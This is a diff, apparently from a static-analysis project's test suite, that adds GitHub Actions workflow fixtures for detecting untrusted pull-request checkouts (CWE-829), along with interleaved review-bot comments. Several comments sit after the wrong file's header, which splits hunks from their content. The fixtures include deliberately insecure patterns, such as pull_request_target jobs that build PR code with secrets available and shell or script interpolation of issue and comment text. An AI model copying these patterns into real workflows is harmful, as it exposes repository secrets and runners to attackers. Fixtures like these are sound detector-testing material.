+ Please click [HERE](${{ steps.create_pr.outputs.pull-request-url }}) and merge this PR to update the cassettes.
+
+ - name: Fail if new PR created
+ if: ${{ env.TIMESTAMP_COMMIT != null }}
+ run: exit 1
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml
new file mode 100644
index 000000000000..afe1dfab038b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml
@@ -0,0 +1,45 @@
+name: Check dist
+
+on:
+ pull_request:
+ push:
+ branches:
+ - main
+ - 'releases/*'
+
+jobs:
+ verify-build: # make sure the checked in dist/ folder matches the output of a rebuild
+ runs-on: ubuntu-latest
+
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - name: Read .nvmrc
+ id: nvm
+ run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT
+
+ - name: Setup Node.js
+ uses: actions/setup-node@v4
+ with:
+ node-version: ${{ steps.nvm.outputs.NVMRC }}
+
+ - name: Install npm dependencies
+ run: npm clean-install
+
+ - name: Rebuild the dist/ directory
+ run: npm run package
+
+ - name: Compare the expected and actual dist/ directories
+ run: script/check-diff
+ verify-index-js: # make sure the entrypoint js files run on a clean machine without compiling first
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: ./
+ with:
+ milliseconds: 1000
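Review bot: In auto_ci.yml's "Stage new files and commit" step, `echo "TIMESTAMP_COMMIT=TIMESTAMP_COMMIT" >> $GITHUB_ENV` writes the literal text rather than the value computed on the previous line, so the later `env.TIMESTAMP_COMMIT != null` guards do fire, but the `branch:` and `title:` of the created PR embed the string `TIMESTAMP_COMMIT` instead of a timestamp. If this fixture is copied verbatim from a real workflow the bug is upstream's and may be worth keeping as-is for fidelity; otherwise the line should read `echo "TIMESTAMP_COMMIT=$TIMESTAMP_COMMIT" >> $GITHUB_ENV`. The hunk starts on an earlier line of this page (the `@@ -0,0 +1,135 @@` header).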
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml
new file mode 100644
index 000000000000..072eae4b1d2a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml
@@ -0,0 +1,68 @@
+name: Compile dependabot updates
+
+on:
+ pull_request:
+
+permissions:
+ pull-requests: write
+ contents: write
+jobs:
+ fetch-dependabot-metadata:
+ runs-on: ubuntu-latest
+ # We only want to check the metadata on pull_request events from Dependabot itself,
+ # any subsequent pushes to the PR should just skip this step so we don't go into
+ # a loop on commits created by the `build-dependabot-changes` job
+ if: ${{ github.actor == 'dependabot[bot]' }}
+ # Map the step output to a job output for subsequent jobs
+ outputs:
+ dependency-type: ${{ steps.dependabot-metadata.outputs.dependency-type }}
+ package-ecosystem: ${{ steps.dependabot-metadata.outputs.package-ecosystem }}
+ steps:
+ - name: Fetch dependabot metadata
+ id: dependabot-metadata
+ uses: dependabot/fetch-metadata@c9c4182bf1b97f5224aee3906fd373f6b61b4526 # v1.6.0
+ with:
+ github-token: "${{ secrets.GITHUB_TOKEN }}"
+ build-dependabot-changes:
+ runs-on: ubuntu-latest
+ needs: [fetch-dependabot-metadata]
+ # We only need to build the dist/ folder if the PR relates to Docker or an npm dependency
+ if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' || needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'npm_and_yarn'
+ steps:
+ # Check out using a PAT so any pushed changes will trigger checkruns
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ token: ${{ secrets.DEPENDABOT_AUTOBUILD }}
+
+ - name: Read .nvmrc
+ id: nvm
+ run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT
+
+ - name: Setup Node.js
+ uses: actions/setup-node@v4
+ with:
+ node-version: ${{ steps.nvm.outputs.NVMRC }}
+
+ - name: Install npm dependencies
+ run: npm clean-install
+
+ # If we're reacting to a Docker PR, we have on extra step to refresh and check in the container manifest,
+ # this **must** happen before rebuilding dist/ so it uses the new version of the manifest
+ - name: Rebuild docker/containers.json
+ if: 
needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker'
+ run: |
+ npm run update-container-manifest
+ git add docker/containers.json
+
+ - name: Rebuild the dist/ directory
+ run: npm run package
+
+ - name: Check in any change to dist/
+ run: |
+ git add dist/
+ # Specifying the full email allows the avatar to show up: https://github.com/orgs/community/discussions/26560
+ git config user.name "github-actions[bot]"
+ git config user.email "41898282+github-actions[bot]@users.noreply.github.com"
+ git commit -m "[dependabot skip] Update dist/ with build changes" || exit 0
+ git push
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml
new file mode 100644
index 000000000000..1bda517c9a12
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml
@@ -0,0 +1,52 @@
+name: Merge Dependabot PR
+
+on: pull_request_target
+
+run-name: Merge Dependabot PR ${{ github.ref_name }}
+
+permissions: write-all
+
+jobs:
+ merge-dependabot-pr:
+ runs-on: ubuntu-latest
+ if: github.actor == 'dependabot[bot]'
+ steps:
+
+ - uses: actions/checkout@v4
+ with:
+ show-progress: false
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: actions/setup-java@v4
+ with:
+ distribution: temurin
+ java-version: 17
+
+ - name: Set Milestone to Dependabot Pull Request
+ id: set-milestone
+ run: |
+ if test -f pom.xml
+ then
+ CURRENT_VERSION=$(mvn help:evaluate -Dexpression="project.version" -q -DforceStdout)
+ else
+ CURRENT_VERSION=$(cat gradle.properties | sed -n '/^version=/ { s/^version=//;p }')
+ fi
+ export CANDIDATE_VERSION=${CURRENT_VERSION/-SNAPSHOT}
+ MILESTONE=$(gh api repos/$GITHUB_REPOSITORY/milestones --jq 'map(select(.due_on != null and (.title | startswith(env.CANDIDATE_VERSION)))) | .[0] | .title')
+
+ if [ -z $MILESTONE ]
+ then
+ gh run cancel ${{ github.run_id }}
+ echo "::warning title=Cannot merge::No scheduled milestone for $CURRENT_VERSION version"
+ else
+ gh pr edit ${{ github.event.pull_request.number }} --milestone $MILESTONE
+ echo mergeEnabled=true >> $GITHUB_OUTPUT
+ fi
+ env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: Merge Dependabot pull request
+ if: steps.set-milestone.outputs.mergeEnabled
+ run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase
+ env:
+ GH_TOKEN: ${{ secrets.GH_ACTIONS_REPO_TOKEN }}
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml
new file mode 100644
index 000000000000..ba4a9523cfed
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml
@@ -0,0 +1,70 @@ +name: Test Formalities + +on: + workflow_call: + +jobs: + build: + name: Test Formalities + runs-on: ubuntu-latest + strategy: + fail-fast: false + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 0 + + - name: Determine branch name + run: | + BRANCH="${GITHUB_BASE_REF#refs/heads/}" + echo "Building for $BRANCH" + echo "BRANCH=$BRANCH" >> $GITHUB_ENV + + - name: Test formalities + run: | + source .github/workflows/scripts/ci_helpers.sh + + RET=0 + for commit in $(git rev-list HEAD ^origin/$BRANCH); do + info "=== Checking commit '$commit'" + if git show --format='%P' -s $commit | grep -qF ' '; then + err "Pull request should not include merge commits" + RET=1 + fi + + author="$(git show -s --format=%aN $commit)" + if echo $author | grep -q '\S\+\s\+\S\+'; then + success "Author name ($author) seems ok" + else + err "Author name ($author) need to be your real name 'firstname lastname'" + RET=1 + fi + + subject="$(git show -s --format=%s $commit)" + if echo "$subject" | grep -q -e '^[0-9A-Za-z,+/_\.-]\+: ' -e '^Revert '; then + success "Commit subject line seems ok ($subject)" + else + err "Commit subject line MUST start with ': ' ($subject)" + RET=1 + fi + + body="$(git show -s --format=%b $commit)" + sob="$(git show -s --format='Signed-off-by: %aN <%aE>' $commit)" + if echo "$body" | grep -qF "$sob"; then + success "Signed-off-by match author" + else + err "Signed-off-by is missing or doesn't match author (should be '$sob')" + RET=1 + fi + + if echo "$body" | grep -v "Signed-off-by:"; then + success "A commit message exists" + else + err "Missing commit message. Please describe your changes" + RET=1 + fi + done + + exit $RET 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml new file mode 100644 index 000000000000..3b8a6d6dd62a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml new file mode 100644 index 000000000000..c91b68f6b875 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml @@ -0,0 +1,12 @@ +name: Test Formalities + +on: + pull_request: + +permissions: + contents: read + +jobs: + build: + name: Test Formalities + uses: TestOrg/TestRepo/.github/workflows/formal.yml@main diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml new file mode 100644 index 000000000000..ab121239c6e1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml 
@@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + # 1. Check out the content from an incoming pull request + - run: | + git fetch origin $HEAD_BRANCH + git checkout origin/master + git config user.name "release-hash-check" + git config user.email "<>" + git merge --no-commit --no-edit origin/$HEAD_BRANCH + env: + HEAD_BRANCH: ${{ github.head_ref }} + - uses: actions/setup-node@v1 + # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as + # the build scripts and referenced packages are controlled by the author of the pull request + - run: | + npm install + npm build diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml new file mode 100644 index 000000000000..221854ec2042 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml 
@@ -0,0 +1,52 @@ +name: PR head from 3rd party action + +on: + workflow_call: + workflow_dispatch: + +jobs: + + test1: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + test2: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + test3: + runs-on: ubuntu-20.04 + steps: + - name: resolve pr refs + id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_ref }} + fetch-depth: 0 + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_sha }} + fetch-depth: 0 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml new file mode 100644 index 000000000000..ece4c02c3565 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml 
@@ -0,0 +1,46 @@ +name: Direct access + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + if: github.event_name == 'issue_comment' && github.event.issue.pull_request + steps: + - name: Unsafe Code Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch + test2: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: refs/pull/${{ github.event.issue.number }}/merge + + test3: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} + + test4: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} + + test5: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml new file mode 100644 index 000000000000..8c0865f598cd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml 
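Review bot: The `test4` job's checkout ref can never resolve to a pull-request ref under this file's triggers: the workflow only declares `on: issue_comment`, so the `github.event_name == 'pull_request_review_comment'` guard is always false and the expression falls through to `''`. If `test4` is meant as a negative case next to `test5`, a comment such as `# negative case: event guard never matches under issue_comment, ref is ''` would make that explicit; if it was meant to exercise the review-comment path, the trigger is missing. `test1` has a similar shape, since `github.event.pull_request.head.ref` and `github.head_ref` are both unset for `issue_comment` events, so its `Unsafe Code Checkout` step also evaluates to an empty ref.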
@@ -0,0 +1,50 @@ +name: Heuristic based + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test2: + runs-on: ubuntu-latest + + steps: + - name: Detect branch for PR + id: vars + run: | + PR=$( echo "${{ github.event.comment.issue_url }}" | grep -oE 'issues/([0-9]+)$' | cut -d'/' -f 2 ) + PR_INFO=$( curl \ + --request GET \ + --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \ + --header 'content-type: application/json' \ + --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR ) + REF=$(echo "${PR_INFO}" | jq -r .head.ref) + echo "branch=$REF" >> $GITHUB_OUTPUT + - uses: actions/checkout@v4 + with: + ref: ${{ steps.vars.outputs.branch }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml new file mode 100644 index 000000000000..1245d0302fb4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml 
@@ -0,0 +1,114 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR + uses: octokit/request-action@v2.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} + token: ${{ secrets.GITHUB_TOKEN }} + + test2: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test3: + if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v4 + with: + result-encoding: string + script: | + const { owner, repo, number } = context.issue; + const pr = await github.pulls.get({ + owner, + repo, + pull_number: number, + }); + return 
pr.data.head.sha + - uses: actions/checkout@v2 + with: + ref: ${{ steps.sha.outputs.result }} + + test4: + if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v6 + with: + result-encoding: string + script: | + const response = await github.request(context.payload.issue.pull_request.url); + return response.data.head.sha; + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.sha.outputs.result }} + + test5: + runs-on: ubuntu-20.04 + steps: + - id: request + uses: octokit/request-action@v2.0.2 + with: + route: ${{ github.event.issue.pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml new file mode 100644 index 000000000000..84081fef5d06 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml 
@@ -0,0 +1,38 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR minor and patch wildcard + uses: octokit/request-action@v2.x.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor patch wildcard + - uses: actions/checkout@v2.x.xx + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor wildcard incomplete patch + uses: actions/checkout@v2.x. + - name: Run latest action + uses: some-action/some-repo@latest + with: + some-input: some-value + - name: run the latest checkout action + uses: actions/checkout@latest \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml new file mode 100644 index 000000000000..56bb143cf367 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -0,0 +1,27 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! 
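Review bot: The step `- name: Checkout PR minor patch wildcard` has neither `uses` nor `run`, and the following `- uses: actions/checkout@v2.x.xx` is a separate, unnamed step; a step with no action or command is invalid workflow YAML, so the extractor may drop or mis-model the exact case this fixture seems written to cover. The intent appears to be one step, `- name: Checkout PR minor patch wildcard` followed by `  uses: actions/checkout@v2.x.xx` at the `with:` indentation. The file also ends without a trailing newline, unlike the other fixtures in this directory.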
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml new file mode 100644 index 000000000000..6014d08ed806 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -0,0 +1,28 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: | + !contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml new file mode 100644 index 000000000000..49908b7b4c51 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml 
@@ -0,0 +1,136 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. 
Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml new file mode 100644 index 000000000000..b539c562084e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml 
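Review bot: Only the `gravy` job in this file is an untrusted-checkout case (`pull_request_target`, checkout of `github.event.pull_request.head.sha`, then `npm install`/`npm start` with `GITHUB_TOKEN` and a flag secret in `env`); `toppings` is its `pull_request`-triggered counterpart, and the `fries` and `cheddar` jobs instead interpolate `github.event.issue.body` into a shell `echo` and `github.event.comment.body` into a JavaScript string literal, which is an expression-injection pattern rather than CWE-829. Since the file lives in the CWE-829 test directory, a header comment stating which job is the positive case and which are negatives or out of scope would keep the expected output reviewable, e.g. `# CWE-829 positive: gravy; toppings is the pull_request negative; fries/cheddar are injection cases not covered here`. The enclosing `level0.yml` hunk starts on the previous line.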
@@ -0,0 +1,33 @@ +name: Test + +on: + workflow_call: + +env: + API_KEY: ${{ secrets.API_KEY != '' && secrets.API_KEY }} + +jobs: + mend: + runs-on: "ubuntu-latest" + steps: + - name: "Set the checkout ref" + id: set_ref + run: | + if [[ "${{ github.event_name }}" == "pull_request_target" ]]; then + echo "ref=${{ github.event.pull_request.head.sha }}" >> $GITHUB_OUTPUT + else + echo "ref=${{ github.ref }}" >> $GITHUB_OUTPUT + fi + + - name: "checkout" + if: success() + uses: "actions/checkout@v4" + with: + fetch-depth: 1 + ref: ${{ steps.set_ref.outputs.ref }} + + - name: "setup ruby" + if: success() + uses: "ruby/setup-ruby@v1" + with: + ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml new file mode 100644 index 000000000000..6900c3bc23fa --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml 
@@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: 